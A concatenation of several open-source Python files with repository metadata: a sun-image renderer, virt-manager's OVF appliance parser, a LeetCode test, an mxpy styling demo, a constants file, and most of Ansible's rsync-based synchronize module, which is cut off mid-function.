    O(width * height * samples) pure-Python work: by far the slowest stage.
    """
    canvas = setup['canvas']   # NOTE(review): unused -- width/height re-read below
    width, height = setup['canvas'][0], setup['canvas'][1]
    decay = 0.8      # per-sample brightness falloff
    density = 1.2    # >1 shortens each march step toward the center
    samples = 128    # samples accumulated per pixel
    center = [ x / 2 for x in setup['canvas'] ]
    list_of_pixels = list(sun_image.getdata())
    new_image = []
    print("starting postprocessing...")
    for y in range(height) :
        # Progress indicator, rewritten in place on the same line.
        print("\rjob completed {0:.2f}%".format(round(100 * (y / height), 2)), flush=True, end="")
        for x in range(width) :
            tc = [x, y]   # current sample coordinate, walked toward the center
            delta = [ (x - center[0]) / (samples * density), (y - center[1]) / (samples * density) ]
            color = list_of_pixels[x + y * width]
            illumination = 1
            for m in range(samples) :
                tc = [ tc[0] - delta[0], tc[1] - delta[1]]
                # Weight the sampled color by the decayed illumination.
                add_color = tuple( illumination * x for x in list_of_pixels[int(tc[0]) + int(tc[1]) * width] )
                illumination *= decay
                color = tuple( x + y for x, y in zip(color, add_color))
            new_image.append(tuple(int(x) for x in color))
    image = Image.new(sun_image.mode, sun_image.size)
    image.putdata(new_image)
    return image
def draw_sun(image, setup) :
    """Draw the sun disc, apply noise and ray effects, composite onto *image*.

    Reads setup['sun'] (bounding box from create_sun) and the base color;
    returns a new composited RGBA image.
    """
    canvas = setup['canvas']
    sun_image = Image.new('RGBA', canvas, (0,0,0,0))
    draw = ImageDraw.Draw(sun_image)
    draw.ellipse(setup['sun'], fill=tuple(setup['color']['base']))
    sun_image = apply_noise(sun_image, setup)
    sun_image = apply_ray_effect(sun_image, setup)
    return Image.alpha_composite(image, sun_image)
def create_sun(setup) :
    """Compute the sun's geometry and store it in *setup* (mutates in place).

    Reads setup['canvas'] and setup['size']; writes 'sun' (bounding box
    [x0, y0, x1, y1]), 'diam', 'rad' and 'center'.
    """
    canvas = setup['canvas']
    size = setup['size']
    # Diameter is 40% (0.08 * 5) of the smaller canvas side at size == 1.
    diameter = min(side * 0.08 * 5 * size for side in canvas)
    x0 = (canvas[0] - diameter) / 2
    y0 = (canvas[1] - diameter) / 2
    setup['sun'] = [x0, y0, x0 + diameter, y0 + diameter]
    setup['diam'] = diameter
    setup['rad'] = diameter / 2
    setup['center'] = [x0 + diameter / 2, y0 + diameter / 2]
def sun_setup(setup) :
    """Translate a (canvas, brightness, color) tuple into the config dict.

    The working canvas is doubled (supersampling; sun() downscales again)
    and the background color is a heavily darkened version of the base.
    """
    canvas, brightness, base_color = setup[0], setup[1], setup[2]
    return {
        'color': {
            'base': base_color,
            'back': [int(channel * 0.05) for channel in base_color],
        },
        'canvas': [side * 2 for side in canvas],
        'size': brightness / (255 * 2),
    }
def sun(setup) :
    """Render the full scene (background + sun) and save it as test.png.

    *setup* is the raw (canvas, brightness, color) tuple; rendering happens
    at 2x resolution and is downsampled for cheap antialiasing.
    """
    setup = sun_setup(setup)
    create_sun(setup)
    image = draw_background(setup)
    image = draw_sun(image, setup)
    # Halve back to the requested output size.
    canvas = [ int(x / 2) for x in setup['canvas'] ]
    # NOTE(review): Image.ANTIALIAS was removed in Pillow 10 (use
    # Image.LANCZOS on modern Pillow) -- confirm target Pillow version.
    resized = image.resize(canvas, Image.ANTIALIAS)
    resized.save("test.png")
# Demo invocation: ((width, height), brightness scalar, base RGB color).
setup = ((1200, 750), 128, (180, 120, 100))
sun(setup)
|
vojtatom/planets
|
sun.py
|
Python
|
gpl-3.0
| 3,499
|
#
# Copyright 2009 Red Hat, Inc.
# Cole Robinson <crobinso@redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import libxml2
import virtconv.formats as formats
import virtconv.vmcfg as vmcfg
import virtconv.diskcfg as diskcfg
import virtconv.netdevcfg as netdevcfg
import logging
# Mapping of ResourceType value to device type
# http://konkretcmpi.org/cim218/CIM_ResourceAllocationSettingData.html
#
# "Other" [1]
# "Computer System" [2]
# "Processor" [3]
# "Memory" [4]
# "IDE Controller" [5]
# "Parallel SCSI HBA" [6]
# "FC HBA" [7]
# "iSCSI HBA" [8]
# "IB HCA" [9]
# "Ethernet Adapter" [10]
# "Other Network Adapter" [11]
# "I/O Slot" [12]
# "I/O Device" [13]
# "Floppy Drive" [14]
# "CD Drive" [15]
# "DVD drive" [16]
# "Disk Drive" [17]
# "Tape Drive" [18]
# "Storage Extent" [19]
# "Other storage device" [20]
# "Serial port" [21]
# "Parallel port" [22]
# "USB Controller" [23]
# "Graphics controller" [24]
# "IEEE 1394 Controller" [25]
# "Partitionable Unit" [26]
# "Base Partitionable Unit" [27]
# "Power" [28]
# "Cooling Capacity" [29]
# "Ethernet Switch Port" [30]
# CIM ResourceType values handled by this parser (see the mapping table in
# the comment block above); compared as strings against XML node content.
DEVICE_CPU = "3"
DEVICE_MEMORY = "4"
DEVICE_IDE_BUS = "5"
DEVICE_SCSI_BUS = "6"
DEVICE_ETHERNET = "10"
DEVICE_DISK = "17"
DEVICE_GRAPHICS = "24"
# AllocationUnits mapping can be found in Appendix C here:
# http://www.dmtf.org/standards/documents/CIM/DSP0004.pdf
def register_namespace(ctx):
    """Register the OVF/CIM XML namespace prefixes on a libxml2 xpath context."""
    namespaces = (
        ("ovf", "http://schemas.dmtf.org/ovf/envelope/1"),
        ("ovfenv", "http://schemas.dmtf.org/ovf/environment/1"),
        ("rasd", "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"),
        ("vssd", "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"),
        ("vmw", "http://www.vmware.com/schema/ovf"),
    )
    for prefix, uri in namespaces:
        ctx.xpathRegisterNs(prefix, uri)
def node_list(node):
    """Return the direct children of *node* as a Python list.

    libxml2 exposes children as a linked list via .children / .next; this
    flattens that chain for convenient iteration.
    """
    children = []
    current = node.children
    while current:
        children.append(current)
        current = current.next
    return children
def get_child_content(parent_node, child_name):
    """Return the content of the first child named *child_name*, or None."""
    matches = (child.content for child in node_list(parent_node)
               if child.name == child_name)
    return next(matches, None)
def convert_alloc_val(ignore, val):
    """Heuristically convert an OVF allocation value to megabytes.

    *ignore* is the AllocationUnits string, deliberately unused.
    XXX: This is a hack, but should we really have to decode
    allocation units = "bytes * 2^20"?
    """
    amount = float(val)
    if amount > 100000000:
        # Big enough that it must be bytes.
        return int(round(amount / 1024.0 / 1024.0))
    if amount > 100000:
        # Mid-range: assume kilobytes.
        return int(round(amount / 1024.0))
    if amount < 32:
        # Tiny: assume gigabytes.
        return int(amount * 1024)
    return int(amount)
def _xml_wrapper(xml, func):
    """Parse *xml*, build an xpath context with the OVF namespaces
    registered, run func(ctx) and return its result.

    libxml2 objects are not garbage collected, so the document and context
    are always explicitly freed, in this exact order.
    """
    doc = None
    ctx = None
    result = None
    try:
        doc = libxml2.parseDoc(xml)
        ctx = doc.xpathNewContext()
        register_namespace(ctx)
        result = func(ctx)
    finally:
        if doc:
            doc.freeDoc()
        if ctx:
            ctx.xpathFreeContext()
    return result
def get_xml_path(xml, path=None, func=None):
    """
    Return the content from the passed xml xpath, or return the result
    of a passed function (receives xpathContext as its only arg)
    """
    def _get_xml_path(ctx):
        result = None
        if path:
            ret = ctx.xpathEval(path)
            if ret is not None:
                if type(ret) == list:
                    if len(ret) >= 1:
                        # NOTE(review): returns the node *list*, not the first
                        # node's content (the commented line was the old
                        # behavior) -- callers treat the result as truthy only.
                        # result = ret[0].content
                        result = ret
                else:
                    result = ret
        elif func:
            result = func(ctx)
        else:
            raise ValueError(_("'path' or 'func' is required."))
        return result
    return _xml_wrapper(xml, _get_xml_path)
def _parse_hw_section(vm, nodes, file_refs, disk_section):
    """Populate *vm* from the <Item> entries of a VirtualHardwareSection.

    nodes: child nodes of the section; file_refs: file id -> path mapping
    from <References>; disk_section: disk id -> (file ref, format) mapping
    from <DiskSection>. Raises ValueError on dangling disk references.
    """
    vm.nr_vcpus = 0
    # Controller InstanceID -> "ide"/"scsi", so disks can find their bus.
    disk_buses = {}
    for device_node in nodes:
        if device_node.name != "Item":
            continue
        # The item's ResourceType decides how the rest of it is read.
        devtype = None
        for item_node in node_list(device_node):
            if item_node.name == "ResourceType":
                devtype = item_node.content
        if devtype == DEVICE_CPU:
            cpus = get_child_content(device_node, "VirtualQuantity")
            if cpus:
                vm.nr_vcpus += int(cpus)
        elif devtype == DEVICE_MEMORY:
            mem = get_child_content(device_node, "VirtualQuantity")
            alloc_str = get_child_content(device_node, "AllocationUnits")
            if mem:
                vm.memory = convert_alloc_val(alloc_str, mem)
        elif devtype == DEVICE_ETHERNET:
            net_model = get_child_content(device_node, "ResourceSubType")
            if net_model:
                net_model = net_model.lower()
            netdev = netdevcfg.netdev(driver=net_model)
            vm.netdevs[len(vm.netdevs)] = netdev
        elif devtype == DEVICE_IDE_BUS:
            instance_id = get_child_content(device_node, "InstanceID")
            disk_buses[instance_id] = "ide"
        elif devtype == DEVICE_SCSI_BUS:
            instance_id = get_child_content(device_node, "InstanceID")
            disk_buses[instance_id] = "scsi"
        elif devtype in [DEVICE_DISK]:
            bus_id = get_child_content(device_node, "Parent")
            path = get_child_content(device_node, "HostResource")
            dev_num = int(get_child_content(device_node, "AddressOnParent"))
            if bus_id and bus_id not in disk_buses:
                raise ValueError(_("Didn't find parent bus for disk '%s'" %
                                   path))
            # Disks with no Parent controller default to IDE.
            bus = (bus_id and disk_buses[bus_id]) or "ide"
            fmt = diskcfg.DISK_FORMAT_RAW
            if path:
                ref = None
                fmt = diskcfg.DISK_FORMAT_VMDK
                # HostResource points either into <DiskSection> or directly
                # at a <References> file entry.
                if path.startswith("ovf:/disk/"):
                    disk_ref = path[len("ovf:/disk/"):]
                    if disk_ref not in disk_section:
                        raise ValueError(_("Unknown reference id '%s' "
                                           "for path %s.") % (path, ref))
                    ref, fmt = disk_section[disk_ref]
                elif path.startswith("ovf:/file/"):
                    ref = path[len("ovf:/file/"):]
                else:
                    raise ValueError(_("Unknown storage path type %s." % path))
                if not ref:
                    # XXX: This means allocate the disk.
                    pass
                if ref not in file_refs:
                    raise ValueError(_("Unknown reference id '%s' "
                                       "for path %s.") % (path, ref))
                path = file_refs[ref]
            disk = diskcfg.disk(path=path, fmt=fmt, bus=bus,
                                typ=diskcfg.DISK_TYPE_DISK)
            vm.disks[(bus, dev_num)] = disk
        else:
            desc = get_child_content(device_node, "Description")
            logging.debug("Unhandled device type=%s desc=%s", devtype, desc)
class ovf_parser(formats.parser):
    """
    Support for OVF appliance configurations.

    Whitepaper: http://www.vmware.com/pdf/ovf_whitepaper_specification.pdf
    Spec: http://www.dmtf.org/standards/published_documents/DSP0243_1.0.0.pdf
    """
    # Parser registration attributes consumed by virtconv.formats.
    name = "ovf"
    suffix = ".ovf"
    can_import = True
    can_export = False
    can_identify = True

    @staticmethod
    def identify_file(input_file):
        """
        Return True if the given file is of this format.
        """
        infile = open(input_file, "r")
        xml = infile.read()
        infile.close()
        res = False
        try:
            # Cheap substring check first, so arbitrary non-OVF XML is not
            # fully parsed; then confirm with a namespace-aware xpath.
            if xml.count("</Envelope>"):
                res = bool(get_xml_path(xml, "/ovf:Envelope"))
        except Exception, e:
            logging.debug("Error parsing OVF XML: %s", str(e))
        return res

    @staticmethod
    def import_file(input_file):
        """
        Import a configuration file. Raises if the file couldn't be
        opened, or parsing otherwise failed.
        """
        infile = open(input_file, "r")
        xml = infile.read()
        infile.close()
        logging.debug("Importing OVF XML:\n%s", xml)
        return _xml_wrapper(xml, ovf_parser._import_file)

    @staticmethod
    def _import_file(ctx):
        # Build a vmcfg.vm from the parsed <Envelope> xpath context.
        def xpath_str(path):
            # Evaluate an xpath; return the first node's content (or the
            # raw non-list result), None when nothing matched.
            ret = ctx.xpathEval(path)
            result = None
            if ret is not None:
                if type(ret) == list:
                    if len(ret) >= 1:
                        result = ret[0].content
                else:
                    result = ret
            return result

        def bool_val(val):
            # OVF boolean attribute string -> Python bool (unknown -> False).
            if str(val).lower() == "false":
                return False
            elif str(val).lower() == "true":
                return True
            return False

        def xpath_nodes(path):
            return ctx.xpathEval(path)

        vm = vmcfg.vm()

        file_refs = {}
        disk_section = {}
        net_section = {}
        name = None
        desc = None
        os_id_ignore = None
        os_ver_ignore = None
        os_type_ignore = None

        # XXX: Can have multiple machines nested as VirtualSystemCollection
        # XXX: Need to check all Envelope

        # General info
        name = xpath_str("/ovf:Envelope/ovf:VirtualSystem/ovf:Name")

        # Map files in <References> to actual filename
        ens = xpath_nodes("/ovf:Envelope[1]")[0]
        # NOTE(review): dead assignment -- immediately rebound by the loop.
        envelope_node = ens.children
        for envelope_node in node_list(ens):
            if envelope_node.name == "References":
                for reference_node in envelope_node.children:
                    if reference_node.name != "File":
                        continue
                    file_id = reference_node.prop("id")
                    path = reference_node.prop("href")
                    # XXX: Should we validate the path exists? This can
                    # be http.
                    if file_id and path:
                        file_refs[file_id] = path
            elif envelope_node.name == "DiskSection":
                for disk_node in envelope_node.children:
                    if disk_node.name != "Disk":
                        continue
                    # NOTE(review): all three branches assign VMDK, so the
                    # if/elif distinction has no effect -- confirm intent.
                    fmt = disk_node.prop("format")
                    if not fmt:
                        fmt = diskcfg.DISK_FORMAT_VMDK
                    elif fmt.lower().count("vmdk"):
                        fmt = diskcfg.DISK_FORMAT_VMDK
                    else:
                        fmt = diskcfg.DISK_FORMAT_VMDK
                    disk_id = disk_node.prop("diskId")
                    file_ref = disk_node.prop("fileRef")
                    capacity = disk_node.prop("capacity")
                    alloc_str = disk_node.prop("AllocationUnits")
                    # NOTE(review): capacity is computed but never stored.
                    capacity = convert_alloc_val(alloc_str, capacity)
                    # XXX: Empty fileref means 'create this disk'
                    disk_section[disk_id] = (file_ref, fmt)
            elif envelope_node.name == "NetworkSection":
                for net_node in envelope_node.children:
                    if net_node.name != "Network":
                        continue
                    net_name_ignore = net_node.prop("name")
                    # NOTE(review): keyed on the VM 'name', not the network
                    # name just read -- looks like a bug; confirm.
                    net_section[name] = None
            elif not envelope_node.isText():
                logging.debug("Unhandled XML section '%s'",
                              envelope_node.name)
                # Per spec, sections flagged required="true" must not be
                # silently skipped.
                req = bool_val(envelope_node.prop("required"))
                if req:
                    raise StandardError(_("OVF section '%s' is listed as "
                                          "required, but parser doesn't know "
                                          "how to handle it.") %
                                          envelope_node.name)

        # Now parse VirtualSystem, since we should have set up all the
        # necessary file/disk/whatever refs
        for envelope_node in node_list(ens):
            if envelope_node.name != "VirtualSystem":
                continue
            for vs_node in node_list(envelope_node):
                if vs_node.name == "Info":
                    pass
                elif vs_node.name == "Name":
                    name = vs_node.content
                elif vs_node.name == "OperatingSystemSection":
                    os_id_ignore = vs_node.prop("id")
                    os_ver_ignore = vs_node.prop("version")
                    # This is the VMWare OS name
                    os_type_ignore = vs_node.prop("osType")
                elif vs_node.name == "VirtualHardwareSection":
                    _parse_hw_section(vm, node_list(vs_node), file_refs,
                                      disk_section)
                elif vs_node.name == "AnnotationSection":
                    for an_node in node_list(vs_node):
                        if an_node.name == "Annotation":
                            desc = an_node.content

        vm.name = name
        vm.description = desc
        vm.validate()
        return vm

    @staticmethod
    def export(vm):
        """
        Export a configuration file as a string.
        @vm vm configuration instance

        Raises ValueError if configuration is not suitable.
        """
        raise NotImplementedError
# Make the OVF parser discoverable by the generic virtconv format machinery.
formats.register_parser(ovf_parser)
|
cardoe/virt-manager
|
virtconv/parsers/ovf.py
|
Python
|
gpl-2.0
| 13,949
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Smoke test for Solution.findWords (LeetCode 212, Word Search II).
from solution import Solution

# 4x4 letter board and candidate word list from the problem statement.
board = [['o','a','a','n'],
         ['e','t','a','e'],
         ['i','h','k','r'],
         ['i','f','l','v']]
words = ["oath","pea","eat","rain"]
sol = Solution()
res = sol.findWords(board, words)
print(res)  # presumably ["oath", "eat"] (order may vary) -- confirm
|
zhlinh/leetcode
|
0212.Word Search II/test.py
|
Python
|
apache-2.0
| 288
|
import clutter
import mxpy as mx
def create_button(parent, text, x, y):
    """Create a 150x100 mx.Button labelled *text*, add it to *parent* and
    position it at (x, y). Returns the button so callers can style it."""
    button = mx.Button(text)
    parent.add(button)
    button.set_size(150, 100)
    button.set_position(x, y)
    return button
if __name__ == '__main__':
    stage = clutter.Stage()
    stage.connect('destroy', clutter.main_quit)
    # Load the shared CSS theme; each button picks its rule via set_name().
    style = mx.style_get_default()
    style.load_from_file('style/default.css')
    button = create_button(stage, "Default Style", 100, 100)
    button.set_name('default-button')
    button = create_button(stage, "Red Style", 100, 300)
    button.set_name('red-button')
    button = create_button(stage, "Green Style", 350, 100)
    button.set_name('green-button')
    button = create_button(stage, "Blue Style", 350, 300)
    button.set_name('blue-button')
    # A button inside an mx.Table, to exercise container styling.
    table = mx.Table()
    table.set_size(200, 80)
    stage.add(table)
    table.set_position(200, 215)
    button = mx.Button("Container Test")
    button.set_name('container-button')
    table.add_actor(button, 0, 0)
    stage.show()
    clutter.main()
|
buztard/mxpy
|
examples/test-styles.py
|
Python
|
lgpl-2.1
| 1,030
|
SECONDS_IN_DAY = 86400  # 24 h * 60 min * 60 s
|
miti0/mosquito
|
core/constants.py
|
Python
|
gpl-3.0
| 24
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012-2013, Timothy Appnel <tim@appnel.com>
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Ansible module metadata: module is in preview status, maintained by core.
ANSIBLE_METADATA = {'status': ['preview'],
                    'supported_by': 'core',
                    'version': '1.0'}
DOCUMENTATION = '''
---
module: synchronize
version_added: "1.4"
short_description: A wrapper around rsync to make common tasks in your playbooks quick and easy.
description:
- C(synchronize) is a wrapper around rsync to make common tasks in your playbooks quick and easy. It is run and originates on the local host where Ansible is being run. Of course, you could just use the C(command) action to call rsync yourself, but you also have to add a fair number of boilerplate options and host facts. C(synchronize) is not intended to provide access to the full power of rsync, but does make the most common invocations easier to implement. You `still` may need to call rsync directly via C(command) or C(shell) depending on your use case.
options:
src:
description:
- Path on the source host that will be synchronized to the destination; The path can be absolute or relative.
required: true
dest:
description:
- Path on the destination host that will be synchronized from the source; The path can be absolute or relative.
required: true
dest_port:
description:
- Port number for ssh on the destination host. Prior to ansible 2.0, the ansible_ssh_port inventory var took precedence over this value.
default: Value of ansible_ssh_port for this host, remote_port config setting, or the value from ssh client configuration if none of those are set
version_added: "1.5"
mode:
description:
- Specify the direction of the synchronization. In push mode the localhost or delegate is the source; In pull mode the remote host in context is the source.
required: false
choices: [ 'push', 'pull' ]
default: 'push'
archive:
description:
- Mirrors the rsync archive flag, enables recursive, links, perms, times, owner, group flags and -D.
choices: [ 'yes', 'no' ]
default: 'yes'
required: false
checksum:
description:
- Skip based on checksum, rather than mod-time & size; Note that the "archive" option is still enabled by default - the "checksum" option will not disable it.
choices: [ 'yes', 'no' ]
default: 'no'
required: false
version_added: "1.6"
compress:
description:
- Compress file data during the transfer. In most cases, leave this enabled unless it causes problems.
choices: [ 'yes', 'no' ]
default: 'yes'
required: false
version_added: "1.7"
existing_only:
description:
- Skip creating new files on receiver.
choices: [ 'yes', 'no' ]
default: 'no'
required: false
version_added: "1.5"
delete:
description:
- Delete files in C(dest) that don't exist (after transfer, not before) in the C(src) path. This option requires C(recursive=yes).
choices: [ 'yes', 'no' ]
default: 'no'
required: false
dirs:
description:
- Transfer directories without recursing
choices: [ 'yes', 'no' ]
default: 'no'
required: false
recursive:
description:
- Recurse into directories.
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
links:
description:
- Copy symlinks as symlinks.
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
copy_links:
description:
- Copy symlinks as the item that they point to (the referent) is copied, rather than the symlink.
choices: [ 'yes', 'no' ]
default: 'no'
required: false
perms:
description:
- Preserve permissions.
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
times:
description:
- Preserve modification times
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
owner:
description:
- Preserve owner (super user only)
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
group:
description:
- Preserve group
choices: [ 'yes', 'no' ]
default: the value of the archive option
required: false
rsync_path:
description:
- Specify the rsync command to run on the remote host. See C(--rsync-path) on the rsync man page.
required: false
rsync_timeout:
description:
- Specify a --timeout for the rsync command in seconds.
default: 0
required: false
set_remote_user:
description:
- put user@ for the remote paths. If you have a custom ssh config to define the remote user for a host
that does not match the inventory user, you should set this parameter to "no".
default: yes
use_ssh_args:
description:
- Use the ssh_args specified in ansible.cfg
default: "no"
choices:
- "yes"
- "no"
version_added: "2.0"
rsync_opts:
description:
- Specify additional rsync options by passing in an array.
default:
required: false
version_added: "1.6"
partial:
description:
- Tells rsync to keep the partial file which should make a subsequent transfer of the rest of the file much faster.
default: no
required: false
version_added: "2.0"
verify_host:
description:
- Verify destination host key.
default: no
required: false
version_added: "2.0"
notes:
- rsync must be installed on both the local and remote host.
- For the C(synchronize) module, the "local host" is the host `the synchronize task originates on`, and the "destination host" is the host `synchronize is connecting to`.
- The "local host" can be changed to a different host by using `delegate_to`. This enables copying between two remote hosts or entirely on one remote machine.
- "The user and permissions for the synchronize `src` are those of the user running the Ansible task on the local host (or the remote_user for a delegate_to host when delegate_to is used)."
- The user and permissions for the synchronize `dest` are those of the `remote_user` on the destination host or the `become_user` if `become=yes` is active.
- In 2.0.0.0 a bug in the synchronize module made become occur on the "local host". This was fixed in 2.0.1.
- Expect that dest=~/x will be ~<remote_user>/x even if using sudo.
- Inspect the verbose output to validate the destination user/host/path
are what was expected.
- To exclude files and directories from being synchronized, you may add
C(.rsync-filter) files to the source directory.
- rsync daemon must be up and running with correct permission when using
rsync protocol in source or destination path.
- The C(synchronize) module forces `--delay-updates` to avoid leaving a destination in a broken in-between state if the underlying rsync process encounters an error. Those synchronizing large numbers of files that are willing to trade safety for performance should call rsync directly.
author: "Timothy Appnel (@tima)"
'''
EXAMPLES = '''
# Synchronization of src on the control machine to dest on the remote hosts
- synchronize:
src: some/relative/path
dest: /some/absolute/path
# Synchronization using rsync protocol (push)
- synchronize:
src: some/relative/path/
dest: rsync://somehost.com/path/
# Synchronization using rsync protocol (pull)
- synchronize:
mode: pull
src: rsync://somehost.com/path/
dest: /some/absolute/path/
# Synchronization using rsync protocol on delegate host (push)
- synchronize:
src: /some/absolute/path/
dest: rsync://somehost.com/path/
delegate_to: delegate.host
# Synchronization using rsync protocol on delegate host (pull)
- synchronize:
mode: pull
src: rsync://somehost.com/path/
dest: /some/absolute/path/
delegate_to: delegate.host
# Synchronization without any --archive options enabled
- synchronize:
src: some/relative/path
dest: /some/absolute/path
archive: no
# Synchronization with --archive options enabled except for --recursive
- synchronize:
src: some/relative/path
dest: /some/absolute/path
recursive: no
# Synchronization with --archive options enabled except for --times, with --checksum option enabled
- synchronize:
src: some/relative/path
dest: /some/absolute/path
checksum: yes
times: no
# Synchronization without --archive options enabled except use --links
- synchronize:
src: some/relative/path
dest: /some/absolute/path
archive: no
links: yes
# Synchronization of two paths both on the control machine
- synchronize:
src: some/relative/path
dest: /some/absolute/path
delegate_to: localhost
# Synchronization of src on the inventory host to the dest on the localhost in pull mode
- synchronize:
mode: pull
src: some/relative/path
dest: /some/absolute/path
# Synchronization of src on delegate host to dest on the current inventory host.
- synchronize:
src: /first/absolute/path
dest: /second/absolute/path
delegate_to: delegate.host
# Synchronize two directories on one remote host.
- synchronize:
src: /first/absolute/path
dest: /second/absolute/path
delegate_to: "{{ inventory_hostname }}"
# Synchronize and delete files in dest on the remote host that are not found in src of localhost.
- synchronize:
src: some/relative/path
dest: /some/absolute/path
delete: yes
recursive: yes
# Synchronize using an alternate rsync command
# This specific command is granted su privileges on the destination
- synchronize:
src: some/relative/path
dest: /some/absolute/path
rsync_path: "su -c rsync"
# Example .rsync-filter file in the source directory
# - var # exclude any path whose last part is 'var'
# - /var # exclude any path starting with 'var' starting at the source directory
# + /var/conf # include /var/conf even though it was previously excluded
# Synchronize passing in extra rsync options
- synchronize:
src: /tmp/helloworld
dest: /var/www/helloworld
rsync_opts:
- "--no-motd"
- "--exclude=.git"
'''
# Cached controller address, discovered once per process from the SSH
# environment variables.
client_addr = None


def substitute_controller(path):
    """Rewrite a 'localhost:'-prefixed rsync path to use the controller's
    address as seen by this host.

    The address comes from SSH_CLIENT, falling back to SSH_CONNECTION
    (both begin with the client address). Raises ValueError when it cannot
    be determined. The result is cached in the module-global client_addr.
    """
    global client_addr
    if not client_addr:
        # A missing environment variable yields None, whose .split raises
        # AttributeError -- that is the signal to try the next variable.
        for env_var in ('SSH_CLIENT', 'SSH_CONNECTION'):
            try:
                client_addr, _ = os.environ.get(env_var, None).split(None, 1)
                break
            except AttributeError:
                continue
        if not client_addr:
            raise ValueError
    if path.startswith('localhost:'):
        path = path.replace('localhost', client_addr, 1)
    return path
def main():
    """Entry point of the synchronize module: build and run an rsync command.

    Reads the module parameters, assembles the rsync command line (including
    the ssh transport options), runs it via run_command and reports
    changed/unchanged based on rsync's itemized --out-format output.
    """
    module = AnsibleModule(
        argument_spec = dict(
            src = dict(required=True),
            dest = dict(required=True),
            dest_port = dict(default=None, type='int'),
            delete = dict(default='no', type='bool'),
            private_key = dict(default=None),
            rsync_path = dict(default=None),
            _local_rsync_path = dict(default='rsync', type='path'),
            _substitute_controller = dict(default='no', type='bool'),
            archive = dict(default='yes', type='bool'),
            checksum = dict(default='no', type='bool'),
            compress = dict(default='yes', type='bool'),
            existing_only = dict(default='no', type='bool'),
            dirs = dict(default='no', type='bool'),
            # these four default to None on purpose: their effective default
            # depends on 'archive' (see the flag-building logic below)
            recursive = dict(type='bool'),
            links = dict(type='bool'),
            copy_links = dict(type='bool'),
            perms = dict(type='bool'),
            times = dict(type='bool'),
            owner = dict(type='bool'),
            group = dict(type='bool'),
            set_remote_user = dict(default='yes', type='bool'),
            rsync_timeout = dict(type='int', default=0),
            rsync_opts = dict(type='list'),
            ssh_args = dict(type='str'),
            partial = dict(default='no', type='bool'),
            verify_host = dict(default='no', type='bool'),
            mode = dict(default='push', choices=['push', 'pull']),
        ),
        supports_check_mode = True
    )
    # Optionally rewrite 'localhost' in the paths to the SSH client address
    # so the remote rsync can connect back to the controller.
    if module.params['_substitute_controller']:
        try:
            source = '"' + substitute_controller(module.params['src']) + '"'
            dest = '"' + substitute_controller(module.params['dest']) + '"'
        except ValueError:
            module.fail_json(msg='Could not determine controller hostname for rsync to send to')
    else:
        source = '"' + module.params['src'] + '"'
        dest = '"' + module.params['dest'] + '"'
    dest_port = module.params['dest_port']
    delete = module.params['delete']
    private_key = module.params['private_key']
    rsync_path = module.params['rsync_path']
    rsync = module.params.get('_local_rsync_path', 'rsync')
    # Fixed: the original read module.params.get('rsync_timeout', 'rsync_timeout'),
    # whose fallback was the meaningless string 'rsync_timeout'.  The key is
    # always present (argument_spec declares default=0), so index it directly.
    rsync_timeout = module.params['rsync_timeout']
    archive = module.params['archive']
    checksum = module.params['checksum']
    compress = module.params['compress']
    existing_only = module.params['existing_only']
    dirs = module.params['dirs']
    partial = module.params['partial']
    # the default of these params depends on the value of archive
    recursive = module.params['recursive']
    links = module.params['links']
    copy_links = module.params['copy_links']
    perms = module.params['perms']
    times = module.params['times']
    owner = module.params['owner']
    group = module.params['group']
    rsync_opts = module.params['rsync_opts']
    ssh_args = module.params['ssh_args']
    verify_host = module.params['verify_host']
    if '/' not in rsync:
        rsync = module.get_bin_path(rsync, required=True)
    # Resolved only to fail early if ssh is missing; the value itself is
    # unused because --rsh is built from the literal 'ssh' below.
    ssh = module.get_bin_path('ssh', required=True)
    cmd = '%s --delay-updates -F' % rsync
    if compress:
        cmd = cmd + ' --compress'
    if rsync_timeout:
        cmd = cmd + ' --timeout=%s' % rsync_timeout
    if module.check_mode:
        cmd = cmd + ' --dry-run'
    if delete:
        cmd = cmd + ' --delete-after'
    if existing_only:
        cmd = cmd + ' --existing'
    if checksum:
        cmd = cmd + ' --checksum'
    if archive:
        cmd = cmd + ' --archive'
        # --archive implies -rlptgoD; callers may opt out of individual flags
        if recursive is False:
            cmd = cmd + ' --no-recursive'
        if links is False:
            cmd = cmd + ' --no-links'
        if copy_links is True:
            cmd = cmd + ' --copy-links'
        if perms is False:
            cmd = cmd + ' --no-perms'
        if times is False:
            cmd = cmd + ' --no-times'
        if owner is False:
            cmd = cmd + ' --no-owner'
        if group is False:
            cmd = cmd + ' --no-group'
    else:
        # without --archive every flag must be requested explicitly
        if recursive is True:
            cmd = cmd + ' --recursive'
        if links is True:
            cmd = cmd + ' --links'
        if copy_links is True:
            cmd = cmd + ' --copy-links'
        if perms is True:
            cmd = cmd + ' --perms'
        if times is True:
            cmd = cmd + ' --times'
        if owner is True:
            cmd = cmd + ' --owner'
        if group is True:
            cmd = cmd + ' --group'
    if dirs:
        cmd = cmd + ' --dirs'
    if private_key is None:
        private_key = ''
    else:
        private_key = '-i "%s"' % private_key
